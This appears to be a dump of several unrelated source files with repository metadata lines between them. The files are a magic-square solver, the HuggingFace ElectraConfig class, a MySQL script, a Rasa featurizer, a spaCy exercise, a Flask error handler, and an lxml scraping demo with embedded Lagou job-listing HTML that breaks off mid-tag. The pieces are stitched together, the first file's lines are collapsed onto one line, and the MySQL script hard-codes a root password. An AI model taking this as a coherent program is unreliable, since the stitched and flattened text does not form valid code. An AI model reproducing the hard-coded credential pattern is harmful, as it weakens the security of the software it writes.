#!/usr/bin/env python3 all_cases = [[[8, 1, 6], [3, 5, 7], [4, 9, 2]], [[6, 1, 8], [7, 5, 3], [2, 9, 4]], [[4, 9, 2], [3, 5, 7], [8, 1, 6]], [[2, 9, 4], [7, 5, 3], [6, 1, 8]], [[8, 3, 4], [1, 5, 9], [6, 7, 2]], [[4, 3, 8], [9, 5, 1], [2, 7, 6]], [[6, 7, 2], [1, 5, 9], [8, 3, 4]], [[2, 7, 6], [9, 5, 1], [4, 3, 8]], ] s = [] for s_i in range(3): s_t = [int(s_temp) for s_temp in input().strip().split(' ')] s.append(s_t) diffs = [sum([abs(cases[i][j] - s[i][j]) for i in range(0, 3) for j in range(0, 3)]) for cases in all_cases] print(min(diffs)) # Origin code # for cases in all_cases: # diff = 0 # for i in range(0, 3): # for j in range(0, 3): # diff += abs(cases[i][j] - s[i][j]) # diffs.append(diff) # # tranpose sample # seeds.append([list(t) for t in list(zip(*seed))])
29.451613
108
0.41402
d9d103effb7ebd2fcd272e2fd1c6ce75e5453a53
8,644
py
Python
methods/transformers/src/transformers/configuration_electra.py
INK-USC/RiddleSense
a3d57eaf084da9cf6b77692c608e2cd2870fbd97
[ "MIT" ]
3
2021-07-06T20:02:31.000Z
2022-03-27T13:13:01.000Z
methods/transformers/src/transformers/configuration_electra.py
INK-USC/RiddleSense
a3d57eaf084da9cf6b77692c608e2cd2870fbd97
[ "MIT" ]
null
null
null
methods/transformers/src/transformers/configuration_electra.py
INK-USC/RiddleSense
a3d57eaf084da9cf6b77692c608e2cd2870fbd97
[ "MIT" ]
null
null
null
# coding=utf-8 # Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team. # Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ ELECTRA model configuration """ from .configuration_utils import PretrainedConfig from .utils import logging logger = logging.get_logger(__name__) ELECTRA_PRETRAINED_CONFIG_ARCHIVE_MAP = { "google/electra-small-generator": "https://s3.amazonaws.com/models.huggingface.co/bert/google/electra-small-generator/config.json", "google/electra-base-generator": "https://s3.amazonaws.com/models.huggingface.co/bert/google/electra-base-generator/config.json", "google/electra-large-generator": "https://s3.amazonaws.com/models.huggingface.co/bert/google/electra-large-generator/config.json", "google/electra-small-discriminator": "https://s3.amazonaws.com/models.huggingface.co/bert/google/electra-small-discriminator/config.json", "google/electra-base-discriminator": "https://s3.amazonaws.com/models.huggingface.co/bert/google/electra-base-discriminator/config.json", "google/electra-large-discriminator": "https://s3.amazonaws.com/models.huggingface.co/bert/google/electra-large-discriminator/config.json", } class ElectraConfig(PretrainedConfig): r""" This is the configuration class to store the configuration of a :class:`~transformers.ElectraModel` or a :class:`~transformers.TFElectraModel`. It is used to instantiate a ELECTRA model according to the specified arguments, defining the model architecture. Instantiating a configuration with the defaults will yield a similar configuration to that of the ELECTRA `google/electra-small-discriminator <https://huggingface.co/google/electra-small-discriminator>`__ architecture. Configuration objects inherit from :class:`~transformers.PretrainedConfig` and can be used to control the model outputs. Read the documentation from :class:`~transformers.PretrainedConfig` for more information. Args: vocab_size (:obj:`int`, `optional`, defaults to 30522): Vocabulary size of the ELECTRA model. Defines the number of different tokens that can be represented by the :obj:`inputs_ids` passed when calling :class:`~transformers.ElectraModel` or :class:`~transformers.TFElectraModel`. embedding_size (:obj:`int`, `optional`, defaults to 128): Dimensionality of the encoder layers and the pooler layer. hidden_size (:obj:`int`, `optional`, defaults to 256): Dimensionality of the encoder layers and the pooler layer. num_hidden_layers (:obj:`int`, `optional`, defaults to 12): Number of hidden layers in the Transformer encoder. num_attention_heads (:obj:`int`, `optional`, defaults to 4): Number of attention heads for each attention layer in the Transformer encoder. intermediate_size (:obj:`int`, `optional`, defaults to 1024): Dimensionality of the "intermediate" (i.e., feed-forward) layer in the Transformer encoder. hidden_act (:obj:`str` or :obj:`Callable`, `optional`, defaults to :obj:`"gelu"`): The non-linear activation function (function or string) in the encoder and pooler. If string, :obj:`"gelu"`, :obj:`"relu"`, :obj:`"silu"` and :obj:`"gelu_new"` are supported. hidden_dropout_prob (:obj:`float`, `optional`, defaults to 0.1): The dropout probability for all fully connected layers in the embeddings, encoder, and pooler. attention_probs_dropout_prob (:obj:`float`, `optional`, defaults to 0.1): The dropout ratio for the attention probabilities. max_position_embeddings (:obj:`int`, `optional`, defaults to 512): The maximum sequence length that this model might ever be used with. Typically set this to something large just in case (e.g., 512 or 1024 or 2048). type_vocab_size (:obj:`int`, `optional`, defaults to 2): The vocabulary size of the :obj:`token_type_ids` passed when calling :class:`~transformers.ElectraModel` or :class:`~transformers.TFElectraModel`. initializer_range (:obj:`float`, `optional`, defaults to 0.02): The standard deviation of the truncated_normal_initializer for initializing all weight matrices. layer_norm_eps (:obj:`float`, `optional`, defaults to 1e-12): The epsilon used by the layer normalization layers. summary_type (:obj:`str`, `optional`, defaults to :obj:`"first"`): Argument used when doing sequence summary. Used in the sequence classification and multiple choice models. Has to be one of the following options: - :obj:`"last"`: Take the last token hidden state (like XLNet). - :obj:`"first"`: Take the first token hidden state (like BERT). - :obj:`"mean"`: Take the mean of all tokens hidden states. - :obj:`"cls_index"`: Supply a Tensor of classification token position (like GPT/GPT-2). - :obj:`"attn"`: Not implemented now, use multi-head attention. summary_use_proj (:obj:`bool`, `optional`, defaults to :obj:`True`): Argument used when doing sequence summary. Used in the sequence classification and multiple choice models. Whether or not to add a projection after the vector extraction. summary_activation (:obj:`str`, `optional`): Argument used when doing sequence summary. Used in the sequence classification and multiple choice models. Pass :obj:`"gelu"` for a gelu activation to the output, any other value will result in no activation. summary_last_dropout (:obj:`float`, `optional`, defaults to 0.0): Argument used when doing sequence summary. Used in the sequence classification and multiple choice models. The dropout ratio to be used after the projection and activation. Examples:: >>> from transformers import ElectraModel, ElectraConfig >>> # Initializing a ELECTRA electra-base-uncased style configuration >>> configuration = ElectraConfig() >>> # Initializing a model from the electra-base-uncased style configuration >>> model = ElectraModel(configuration) >>> # Accessing the model configuration >>> configuration = model.config """ model_type = "electra" def __init__( self, vocab_size=30522, embedding_size=128, hidden_size=256, num_hidden_layers=12, num_attention_heads=4, intermediate_size=1024, hidden_act="gelu", hidden_dropout_prob=0.1, attention_probs_dropout_prob=0.1, max_position_embeddings=512, type_vocab_size=2, initializer_range=0.02, layer_norm_eps=1e-12, summary_type="first", summary_use_proj=True, summary_activation="gelu", summary_last_dropout=0.1, pad_token_id=0, **kwargs ): super().__init__(pad_token_id=pad_token_id, **kwargs) self.vocab_size = vocab_size self.embedding_size = embedding_size self.hidden_size = hidden_size self.num_hidden_layers = num_hidden_layers self.num_attention_heads = num_attention_heads self.intermediate_size = intermediate_size self.hidden_act = hidden_act self.hidden_dropout_prob = hidden_dropout_prob self.attention_probs_dropout_prob = attention_probs_dropout_prob self.max_position_embeddings = max_position_embeddings self.type_vocab_size = type_vocab_size self.initializer_range = initializer_range self.layer_norm_eps = layer_norm_eps self.summary_type = summary_type self.summary_use_proj = summary_use_proj self.summary_activation = summary_activation self.summary_last_dropout = summary_last_dropout
54.708861
144
0.686719
76e4aff3ee9efc9424a901af81997883bce88779
238
py
Python
FUNCTIONS CLASS 12.py
sanxy/hacktoberfest-1
913582b310688d496602e8b1bc9166cb64866e38
[ "MIT" ]
null
null
null
FUNCTIONS CLASS 12.py
sanxy/hacktoberfest-1
913582b310688d496602e8b1bc9166cb64866e38
[ "MIT" ]
null
null
null
FUNCTIONS CLASS 12.py
sanxy/hacktoberfest-1
913582b310688d496602e8b1bc9166cb64866e38
[ "MIT" ]
1
2020-09-30T18:53:05.000Z
2020-09-30T18:53:05.000Z
import mysql.connector mydb = mysql.connector.connect(host="localhost",user='root',passwd='thebeast',database='employees21') mycursor = mydb.cursor() mycursor.execute('select ename from emp1') for i in mycursor: print (i)
23.8
102
0.718487
0a464ba136340553b3e81399e9eab7ebc0939ffa
11,260
py
Python
rasa/nlu/featurizers/sparse_featurizer/lexical_syntactic_featurizer.py
chaneyjd/rasa
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
[ "Apache-2.0" ]
37
2019-06-07T07:39:00.000Z
2022-01-27T08:32:57.000Z
rasa/nlu/featurizers/sparse_featurizer/lexical_syntactic_featurizer.py
chaneyjd/rasa
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
[ "Apache-2.0" ]
209
2020-03-18T18:28:12.000Z
2022-03-01T13:42:29.000Z
rasa/nlu/featurizers/sparse_featurizer/lexical_syntactic_featurizer.py
chaneyjd/rasa
104a9591fc10b96eaa7fe402b6d64ca652b7ebe2
[ "Apache-2.0" ]
65
2019-05-21T12:16:53.000Z
2022-02-23T10:54:15.000Z
import logging from collections import defaultdict, OrderedDict from pathlib import Path import numpy as np from typing import Any, Dict, Optional, Text, List, Type, Union from rasa.nlu.tokenizers.spacy_tokenizer import POS_TAG_KEY from rasa.shared.constants import DOCS_URL_COMPONENTS from rasa.nlu.components import Component from rasa.nlu.tokenizers.tokenizer import Token from rasa.nlu.tokenizers.tokenizer import Tokenizer from rasa.nlu.featurizers.featurizer import SparseFeaturizer from rasa.shared.nlu.training_data.features import Features from rasa.nlu.config import RasaNLUModelConfig from rasa.shared.nlu.training_data.training_data import TrainingData from rasa.shared.nlu.training_data.message import Message from rasa.nlu.constants import TOKENS_NAMES, FEATURIZER_CLASS_ALIAS from rasa.shared.nlu.constants import TEXT, FEATURE_TYPE_SEQUENCE from rasa.nlu.model import Metadata import rasa.utils.io as io_utils logger = logging.getLogger(__name__) END_OF_SENTENCE = "EOS" BEGIN_OF_SENTENCE = "BOS" class LexicalSyntacticFeaturizer(SparseFeaturizer): """Creates features for entity extraction. Moves with a sliding window over every token in the user message and creates features according to the configuration. """ @classmethod def required_components(cls) -> List[Type[Component]]: return [Tokenizer] defaults = { # 'features' is [before, word, after] array with before, word, # after holding keys about which features to use for each word, # for example, 'title' in array before will have the feature # "is the preceding word in title case?" # POS features require 'SpacyTokenizer'. "features": [ ["low", "title", "upper"], ["BOS", "EOS", "low", "upper", "title", "digit"], ["low", "title", "upper"], ] } function_dict = { "low": lambda token: token.text.islower(), "title": lambda token: token.text.istitle(), "prefix5": lambda token: token.text[:5], "prefix2": lambda token: token.text[:2], "suffix5": lambda token: token.text[-5:], "suffix3": lambda token: token.text[-3:], "suffix2": lambda token: token.text[-2:], "suffix1": lambda token: token.text[-1:], "pos": lambda token: token.data.get(POS_TAG_KEY) if POS_TAG_KEY in token.data else None, "pos2": lambda token: token.data.get(POS_TAG_KEY)[:2] if "pos" in token.data else None, "upper": lambda token: token.text.isupper(), "digit": lambda token: token.text.isdigit(), } def __init__( self, component_config: Dict[Text, Any], feature_to_idx_dict: Optional[Dict[Text, Any]] = None, ): super().__init__(component_config) self.feature_to_idx_dict = feature_to_idx_dict or {} self.number_of_features = self._calculate_number_of_features() def _calculate_number_of_features(self) -> int: return sum( [ len(feature_values.values()) for feature_values in self.feature_to_idx_dict.values() ] ) def train( self, training_data: TrainingData, config: Optional[RasaNLUModelConfig] = None, **kwargs: Any, ) -> None: self.feature_to_idx_dict = self._create_feature_to_idx_dict(training_data) self.number_of_features = self._calculate_number_of_features() for example in training_data.training_examples: self._create_sparse_features(example) def process(self, message: Message, **kwargs: Any) -> None: self._create_sparse_features(message) def _create_feature_to_idx_dict( self, training_data: TrainingData ) -> Dict[Text, Dict[Text, int]]: """Create dictionary of all feature values. Each feature key, defined in the component configuration, points to different feature values and their indices in the overall resulting feature vector. """ # get all possible feature values all_features = [] for example in training_data.training_examples: tokens = example.get(TOKENS_NAMES[TEXT]) if tokens: all_features.append(self._tokens_to_features(tokens)) # build vocabulary of features feature_vocabulary = self._build_feature_vocabulary(all_features) # assign a unique index to each feature value return self._map_features_to_indices(feature_vocabulary) @staticmethod def _map_features_to_indices( feature_vocabulary: Dict[Text, List[Text]] ) -> Dict[Text, Dict[Text, int]]: feature_to_idx_dict = {} offset = 0 for feature_name, feature_values in feature_vocabulary.items(): feature_to_idx_dict[feature_name] = { str(feature_value): feature_idx for feature_idx, feature_value in enumerate( sorted(feature_values), start=offset ) } offset += len(feature_values) return feature_to_idx_dict @staticmethod def _build_feature_vocabulary( features: List[List[Dict[Text, Any]]] ) -> Dict[Text, List[Text]]: feature_vocabulary = defaultdict(set) for sentence_features in features: for token_features in sentence_features: for feature_name, feature_value in token_features.items(): feature_vocabulary[feature_name].add(feature_value) # sort items to ensure same order every time (for tests) feature_vocabulary = OrderedDict(sorted(feature_vocabulary.items())) return feature_vocabulary def _create_sparse_features(self, message: Message) -> None: """Convert incoming messages into sparse features using the configured features.""" import scipy.sparse tokens = message.get(TOKENS_NAMES[TEXT]) # this check is required because there might be training data examples without TEXT, # e.g., `Message("", {action_name: "action_listen"})` if tokens: sentence_features = self._tokens_to_features(tokens) one_hot_seq_feature_vector = self._features_to_one_hot(sentence_features) sequence_features = scipy.sparse.coo_matrix(one_hot_seq_feature_vector) final_sequence_features = Features( sequence_features, FEATURE_TYPE_SEQUENCE, TEXT, self.component_config[FEATURIZER_CLASS_ALIAS], ) message.add_features(final_sequence_features) def _tokens_to_features(self, tokens: List[Token]) -> List[Dict[Text, Any]]: """Convert words into discrete features.""" configured_features = self.component_config["features"] sentence_features = [] for token_idx in range(len(tokens)): # get the window size (e.g. before, word, after) of the configured features # in case of an even number we will look at one more word before, # e.g. window size 4 will result in a window range of # [-2, -1, 0, 1] (0 = current word in sentence) window_size = len(configured_features) half_window_size = window_size // 2 window_range = range(-half_window_size, half_window_size + window_size % 2) prefixes = [str(i) for i in window_range] token_features = {} for pointer_position in window_range: current_idx = token_idx + pointer_position # skip, if current_idx is pointing to a non-existing token if current_idx < 0 or current_idx >= len(tokens): continue token = tokens[token_idx + pointer_position] current_feature_idx = pointer_position + half_window_size prefix = prefixes[current_feature_idx] for feature in configured_features[current_feature_idx]: token_features[f"{prefix}:{feature}"] = self._get_feature_value( feature, token, token_idx, pointer_position, len(tokens) ) sentence_features.append(token_features) return sentence_features def _features_to_one_hot( self, sentence_features: List[Dict[Text, Any]] ) -> np.ndarray: """Convert the word features into a one-hot presentation using the indices in the feature-to-idx dictionary.""" one_hot_seq_feature_vector = np.zeros( [len(sentence_features), self.number_of_features] ) for token_idx, token_features in enumerate(sentence_features): for feature_name, feature_value in token_features.items(): feature_value_str = str(feature_value) if ( feature_name in self.feature_to_idx_dict and feature_value_str in self.feature_to_idx_dict[feature_name] ): feature_idx = self.feature_to_idx_dict[feature_name][ feature_value_str ] one_hot_seq_feature_vector[token_idx][feature_idx] = 1 return one_hot_seq_feature_vector def _get_feature_value( self, feature: Text, token: Token, token_idx: int, pointer_position: int, token_length: int, ) -> Union[bool, int, Text]: if feature == END_OF_SENTENCE: return token_idx + pointer_position == token_length - 1 if feature == BEGIN_OF_SENTENCE: return token_idx + pointer_position == 0 if feature not in self.function_dict: raise ValueError( f"Configured feature '{feature}' not valid. Please check " f"'{DOCS_URL_COMPONENTS}' for valid configuration parameters." ) value = self.function_dict[feature](token) if value is None: logger.debug( f"Invalid value '{value}' for feature '{feature}'." f" Feature is ignored." ) return value @classmethod def load( cls, meta: Dict[Text, Any], model_dir: Optional[Text] = None, model_metadata: Optional[Metadata] = None, cached_component: Optional["LexicalSyntacticFeaturizer"] = None, **kwargs: Any, ) -> "LexicalSyntacticFeaturizer": file_name = meta.get("file") feature_to_idx_file = Path(model_dir) / f"{file_name}.feature_to_idx_dict.pkl" feature_to_idx_dict = io_utils.json_unpickle(feature_to_idx_file) return LexicalSyntacticFeaturizer(meta, feature_to_idx_dict=feature_to_idx_dict) def persist(self, file_name: Text, model_dir: Text) -> Optional[Dict[Text, Any]]: """Persist this model into the passed directory. Return the metadata necessary to load the model again.""" feature_to_idx_file = Path(model_dir) / f"{file_name}.feature_to_idx_dict.pkl" io_utils.json_pickle(feature_to_idx_file, self.feature_to_idx_dict) return {"file": file_name}
37.161716
92
0.642007
6aadbc149a4009a745fe1c5424569f28af289cd3
295
py
Python
exercises/fr/exc_01_08_02.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
2,085
2019-04-17T13:10:40.000Z
2022-03-30T21:51:46.000Z
exercises/fr/exc_01_08_02.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
79
2019-04-18T14:42:55.000Z
2022-03-07T08:15:43.000Z
exercises/fr/exc_01_08_02.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
361
2019-04-17T13:34:32.000Z
2022-03-28T04:42:45.000Z
import spacy nlp = spacy.load("fr_core_news_sm") text = "Apple a été créée en 1976 par Steve Wozniak, Steve Jobs et Ron Wayne." # Traite le texte doc = ____ # Itère sur les entités prédites for ent in ____.____: # Affiche le texte de l'entité et son label print(ent.____, ____.____)
21.071429
78
0.715254
0a801caf4b2b74512bea3fecc7a23036652df9bc
303
py
Python
web/interceptors/ErrorInterceptor.py
yao6891/FlaskOrdering
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
[ "Apache-2.0" ]
2
2019-06-10T08:57:47.000Z
2021-06-12T16:22:15.000Z
web/interceptors/ErrorInterceptor.py
yao6891/FlaskOrdering
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
[ "Apache-2.0" ]
null
null
null
web/interceptors/ErrorInterceptor.py
yao6891/FlaskOrdering
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- from application import app from common.libs.Helper import ops_render from common.libs.LogService import LogService @app.errorhandler(404) def error_404(e): LogService.add_error_log(str(e)) return ops_render('error/error.html', {'status': 404, 'msg': '很抱歉!您访问的页面不存在'})
27.545455
82
0.732673
86e434ce86d2a788348dd975202cf547479816c8
47,418
py
Python
nz_crawl_demo/day3/demo1.py
gaohj/nzflask_bbs
36a94c380b78241ed5d1e07edab9618c3e8d477b
[ "Apache-2.0" ]
null
null
null
nz_crawl_demo/day3/demo1.py
gaohj/nzflask_bbs
36a94c380b78241ed5d1e07edab9618c3e8d477b
[ "Apache-2.0" ]
27
2020-02-12T07:55:58.000Z
2022-03-12T00:19:09.000Z
nz_crawl_demo/day3/demo1.py
gaohj/nzflask_bbs
36a94c380b78241ed5d1e07edab9618c3e8d477b
[ "Apache-2.0" ]
2
2020-02-18T01:54:55.000Z
2020-02-21T11:36:28.000Z
from lxml import etree text = """ <ul class="item_con_list" style="display: block;"> <li class="con_list_item first_row default_list" data-index="0" data-positionid="3580958" data-salary="18k-25k" data-company="众禄金融" data-positionname="python工程师" data-companyid="50285" data-hrid="1509336" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3580958.html" target="_blank" data-index="0" data-lg-tj-id="8E00" data-lg-tj-no=" 0101 " data-lg-tj-cid="3580958" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">python工程师</h3> <span class="add">[<em>罗湖区</em>]</span> </a> <span class="format-time">3天前发布</span> <input type="hidden" class="hr_portrait" value=""> <input type="hidden" class="hr_name" value="石经理"> <input type="hidden" class="hr_position" value="招聘经理"> <input type="hidden" class="target_hr" value="1509336"> <input type="hidden" class="target_position" value="3580958"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0101" data-lg-tj-cid="50285" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> <i class="pos_icon pos_icon_12"></i></div> <div class="p_bot"> <div class="li_b_l"> <span class="money">18k-25k</span> <!--<i></i>-->经验3-5年 / 大专 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/50285.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0101 " data-lg-tj-cid="50285" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">众禄金融</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 移动互联网,金融 / 上市公司 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/50285.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0101 " data-lg-tj-cid="50285" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image2/M00/18/65/CgotOVn65YSAAu7lAAAVwDCKc5w606.png" alt="众禄金融" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>金融</span> <span>信息安全</span> <span>php</span> <span>Java</span> <span>web</span> </div> <div class="li_b_r">“互联网金融,高速发展,五险一金,金融中心”</div> </div> </li> <li class="con_list_item default_list" data-index="1" data-positionid="3172437" data-salary="10k-15k" data-company="乐易网络" data-positionname="python开发工程师" data-companyid="33627" data-hrid="569371" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3172437.html" target="_blank" data-index="1" data-lg-tj-id="8E00" data-lg-tj-no=" 0102 " data-lg-tj-cid="3172437" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">python开发工程师</h3> <span class="add">[<em>南山区</em>]</span> </a> <span class="format-time">2天前发布</span> <input type="hidden" class="hr_portrait" value="i/image/M00/4C/88/CgpFT1lwWhiAB5C2AAD55Ttkxck626.jpg"> <input type="hidden" class="hr_name" value="Tina"> <input type="hidden" class="hr_position" value="HR"> <input type="hidden" class="target_hr" value="569371"> <input type="hidden" class="target_position" value="3172437"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0102" data-lg-tj-cid="33627" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"> <div class="chat_pop_up"> <span class="arrow"></span> <dl class="chat_main clearfix"> <dt><div class="chat_qrcode"><canvas width="116" height="116"></canvas></div></dt> <dd> <dl class="chat_head clearfix"> <dt> <img class="hr_headpic" src="https://static.lagou.com/i/image/M00/4C/88/CgpFT1lwWhiAB5C2AAD55Ttkxck626.jpg" alt="hr头像" width="62" height="62"> </dt> <dd> <div class="hr_name">Tina</div> <div class="hr_position">HR</div> </dd> <dd class="tips_text">Hi,对我发布的职位感兴趣?用拉勾APP扫码,直接和我聊聊吧!</dd> </dl> </dd> </dl> </div> </div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">10k-15k</span> <!--<i></i>-->经验3-5年 / 本科 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/33627.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0102 " data-lg-tj-cid="33627" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">乐易网络</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 移动互联网,游戏 / A轮 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/33627.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0102 " data-lg-tj-cid="33627" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/57/05/CgqKkVfOIv6AQwyPAAEg94dso0Q147.png" alt="乐易网络" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>php</span> <span>MySQL</span> <span>后端</span> </div> <div class="li_b_r">“五险一金,年终奖金”</div> </div> </li> <li class="con_list_item default_list" data-index="2" data-positionid="3088129" data-salary="10k-20k" data-company="对酒当歌" data-positionname="python开发工程师" data-companyid="32901" data-hrid="557623" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3088129.html" target="_blank" data-index="2" data-lg-tj-id="8E00" data-lg-tj-no=" 0103 " data-lg-tj-cid="3088129" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">python开发工程师</h3> <span class="add">[<em>宝安区</em>]</span> </a> <span class="format-time">2天前发布</span> <input type="hidden" class="hr_portrait" value="i/image2/M00/1D/93/CgoB5loJToSAXS5UAAAxRCAgR0I656.jpg"> <input type="hidden" class="hr_name" value="Fiona"> <input type="hidden" class="hr_position" value="HR"> <input type="hidden" class="target_hr" value="557623"> <input type="hidden" class="target_position" value="3088129"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0103" data-lg-tj-cid="32901" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">10k-20k</span> <!--<i></i>-->经验1-3年 / 大专 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/32901.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0103 " data-lg-tj-cid="32901" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">对酒当歌</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 电子商务,O2O / A轮 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/32901.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0103 " data-lg-tj-cid="32901" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image2/M00/1D/93/CgoB5loJTs6AbgL2AAAxM5rVkG8611.jpg" alt="对酒当歌" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>php</span> <span>Java</span> <span>MySQL</span> </div> <div class="li_b_r">“五险一金,免费班车”</div> </div> </li> <li class="con_list_item default_list" data-index="3" data-positionid="3163697" data-salary="15k-30k" data-company="笨鸟社交" data-positionname="python工程师" data-companyid="84086" data-hrid="3628930" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3163697.html" target="_blank" data-index="3" data-lg-tj-id="8E00" data-lg-tj-no=" 0104 " data-lg-tj-cid="3163697" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">python工程师</h3> <span class="add">[<em>南山区</em>]</span> </a> <span class="format-time">1天前发布</span> <input type="hidden" class="hr_portrait" value="i/image2/M00/21/C0/CgotOVoTm-KAL5xbAAEYJ1YAVhc922.jpg"> <input type="hidden" class="hr_name" value="马小姐"> <input type="hidden" class="hr_position" value=""> <input type="hidden" class="target_hr" value="3628930"> <input type="hidden" class="target_position" value="3163697"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0104" data-lg-tj-cid="84086" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> <i class="pos_icon pos_icon_12"></i></div> <div class="p_bot"> <div class="li_b_l"> <span class="money">15k-30k</span> <!--<i></i>-->经验不限 / 本科 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/84086.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0104 " data-lg-tj-cid="84086" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">笨鸟社交</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 企业服务 / B轮 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/84086.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0104 " data-lg-tj-cid="84086" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"><img src="//static.lagou.com/thumbnail_120x120/i/image/M00/10/1C/CgpFT1jwK86AVr_OAACaAuJFFLw446.png" alt="笨鸟社交" width="60" height="60"></a> </div> </div> <div class="list_item_bot"> <div class="li_b_l"> <span>爬虫</span> <span>后端</span> <span>初级</span> <span>中级</span> <span>搜索</span> </div> <div class="li_b_r">“海量数据”</div> </div> </li> <li class="con_list_item default_list" data-index="4" data-positionid="3867111" data-salary="15k-28k" data-company="博奥特科技" data-positionname="Python工程师" data-companyid="69152" data-hrid="9207315" data-tpladword="0"> <div class="list_item_top"> <div class="position"> <div class="p_top"> <a class="position_link" href="https://www.lagou.com/jobs/3867111.html" target="_blank" data-index="4" data-lg-tj-id="8E00" data-lg-tj-no=" 0105 " data-lg-tj-cid="3867111" data-lg-tj-abt="dm-csearch-useUserAllInterest|0"> <h3 style="max-width: 180px;">Python工程师</h3> <span class="add">[<em>上步</em>]</span> </a> <span class="format-time">2天前发布</span> <input type="hidden" class="hr_portrait" value="i/image2/M00/1C/84/CgoB5loFXcaAMM23AABudjCbyWs865.png"> <input type="hidden" class="hr_name" value="qiuff"> <input type="hidden" class="hr_position" value="招聘部"> <input type="hidden" class="target_hr" value="9207315"> <input type="hidden" class="target_position" value="3867111"> <div class="chat_me" data-lg-tj-id="1WI0" data-lg-tj-no="0105" data-lg-tj-cid="69152" data-lg-tj-track-code="search_code" data-lg-tj-track-type="1"></div> </div> <div class="p_bot"> <div class="li_b_l"> <span class="money">15k-28k</span> <!--<i></i>-->经验3-5年 / 大专 </div> </div> </div> <div class="company"> <div class="company_name"> <a href="https://www.lagou.com/gongsi/69152.html" target="_blank" data-lg-tj-id="8F00" data-lg-tj-no=" 0105 " data-lg-tj-cid="69152" data-lg-tj-abt="dm-csearch-useUserAllInterest|0">博奥特科技</a><i class="company_mark"><span>该企业已上传营业执照并通过资质验证审核</span></i> </div> <div class="industry"> 移动互联网,金融 / 未融资 </div> </div> <div class="com_logo"> <a href="https://www.lagou.com/gongsi/69152.html" target="_blank" data-lg-tj-id="8G00" data-lg-tj-no=" 0105 " data-lg-tj-cid="69152" 